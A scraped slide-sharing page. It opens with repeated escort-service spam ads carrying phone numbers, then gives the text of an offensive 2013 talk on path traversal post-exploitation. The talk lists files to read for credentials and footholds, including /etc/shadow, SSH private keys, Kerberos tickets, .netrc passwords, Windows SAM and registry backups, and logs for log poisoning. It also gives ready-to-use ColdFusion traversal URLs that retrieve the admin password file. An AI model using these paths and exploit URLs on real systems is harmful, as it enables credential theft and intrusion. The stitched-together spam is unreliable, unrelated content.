Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 

4.1. Path traversal post_exploitation

  • 1. Path traversal post exploitation By George Lagoda Nov 23, 2013
  • 2. This slide intentionally left blank (always dreamed of it )
  • 3.
  • 4. Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
  • 5. /etc/passwd – why so special?
  • 6. Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
  • 7. Looks like epic win??: After analyzing prepare_release.sh:
  • 8.
  • 9. .netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
  • 10. Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
  • 11. Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
  • 12. What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
  • 14. File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
  • 15. %SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
  • 16. U really thought I will forget bout kittens?
  • 17. • /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
  • 19. Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
  • 20. • In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
  • 22. Thank you for visiting us And HACK YOU  (the end).